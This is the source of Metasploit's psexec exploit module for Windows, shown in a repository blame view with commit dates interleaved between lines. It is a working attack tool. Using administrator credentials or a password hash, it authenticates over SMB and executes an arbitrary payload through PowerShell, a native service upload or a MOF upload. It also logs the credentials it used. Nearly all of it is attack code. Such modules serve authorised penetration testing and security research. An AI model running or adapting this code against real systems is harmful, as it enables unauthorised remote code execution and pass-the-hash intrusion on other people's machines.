Files
metasploit-gs/modules/exploits/windows/smb/psexec.rb
T

188 lines
6.0 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2014-07-16 15:29:23 -05:00
# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = ManualRanking
2015-02-13 17:17:59 -06:00
include Msf::Exploit::Remote::SMB::Client::Psexec
2015-10-30 16:21:24 -05:00
include Msf::Exploit::Powershell
2013-08-30 16:28:54 -05:00
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
2015-10-30 16:21:24 -05:00
include Msf::Auxiliary::Report
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Authenticated User Code Execution',
'Description' => %q{
This module uses a valid administrator username and password (or
password hash) to execute an arbitrary payload. This module is similar
to the "psexec" utility provided by SysInternals. This module is now able
to clean up after itself. The service created by this tool uses a randomly
chosen name and description.
},
'Author' =>
[
'hdm',
2015-10-30 16:21:24 -05:00
'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module
'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders
2013-08-30 16:28:54 -05:00
],
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
2015-10-30 16:21:24 -05:00
'EXITFUNC' => 'thread'
2013-08-30 16:28:54 -05:00
},
'References' =>
[
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
2015-10-30 16:21:24 -05:00
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],
[ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
2015-10-30 16:21:24 -05:00
[ 'URL', 'http://sourceforge.net/projects/smbexec/' ]
2013-08-30 16:28:54 -05:00
],
'Payload' =>
{
'Space' => 3072,
2016-03-30 23:38:46 -05:00
'DisableNops' => true
2013-08-30 16:28:54 -05:00
},
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
2013-08-30 16:28:54 -05:00
'Targets' =>
[
[ 'Automatic', { } ],
2015-10-30 16:21:24 -05:00
[ 'PowerShell', { } ],
[ 'Native upload', { } ],
[ 'MOF upload', { } ]
2013-08-30 16:28:54 -05:00
],
'DefaultTarget' => 0,
# For the CVE, PsExec was first released around February or March 2001
'DisclosureDate' => 'Jan 01 1999'
))
register_options(
[
OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])
])
2013-08-30 16:28:54 -05:00
register_advanced_options(
[
2013-11-06 11:28:13 -06:00
OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
2014-01-06 23:45:55 +01:00
OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil])
])
2013-08-30 16:28:54 -05:00
end
def native_upload_with_workaround
# Avoid implementing NTLMSSP on Windows XP
2018-09-15 18:54:45 -05:00
# https://seclists.org/metasploit/2009/q1/6
if smb_peer_os == "Windows 5.1"
connect(versions: [1])
smb_login
end
native_upload(datastore['SHARE'])
end
2013-08-30 16:28:54 -05:00
def exploit
print_status("Connecting to the server...")
connect(versions: [2,1])
2013-08-30 16:28:54 -05:00
print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
smb_login
2013-08-30 16:28:54 -05:00
2013-11-06 11:28:13 -06:00
if not simple.client.auth_user and not datastore['ALLOW_GUEST']
2013-08-30 16:28:54 -05:00
print_line(" ")
print_error(
"FAILED! The remote host has only provided us with Guest privileges. " +
"Please make sure that the correct username and password have been provided. " +
"Windows XP systems that are not part of a domain will only provide Guest privileges " +
"to network logins by default."
)
print_line(" ")
disconnect
2015-12-18 15:54:51 -06:00
return
2013-08-30 16:28:54 -05:00
end
2015-10-30 16:21:24 -05:00
if datastore['SMBUser'].to_s.strip.length > 0
report_auth
end
2014-06-02 14:53:40 -05:00
2015-10-30 16:21:24 -05:00
case target.name
when 'Automatic'
2018-04-24 21:55:09 +05:30
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
2015-10-30 16:21:24 -05:00
print_status('Selecting PowerShell target')
2018-04-25 08:56:54 +05:30
execute_powershell_payload
2013-08-30 16:28:54 -05:00
else
2015-10-30 16:21:24 -05:00
print_status('Selecting native target')
native_upload_with_workaround
2013-08-30 16:28:54 -05:00
end
2015-10-30 16:21:24 -05:00
when 'PowerShell'
2018-04-25 08:56:54 +05:30
execute_powershell_payload
2015-10-30 16:21:24 -05:00
when 'Native upload'
native_upload_with_workaround
2015-10-30 16:21:24 -05:00
when 'MOF upload'
2018-04-24 21:55:09 +05:30
mof_upload(datastore['SHARE'])
2015-10-30 16:21:24 -05:00
end
2014-06-02 14:20:54 -05:00
2015-10-30 16:21:24 -05:00
handler
disconnect
end
2018-04-24 23:00:55 +05:30
def report_auth
service_data = {
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
port: datastore['RPORT'],
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: datastore['SMBPass'],
username: datastore['SMBUser'].downcase
}
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
credential_data.merge!({
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: datastore['SMBDomain']
})
end
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
credential_data.merge!({:private_type => :ntlm_hash})
else
credential_data.merge!({:private_type => :password})
end
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
access_level: 'Admin',
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end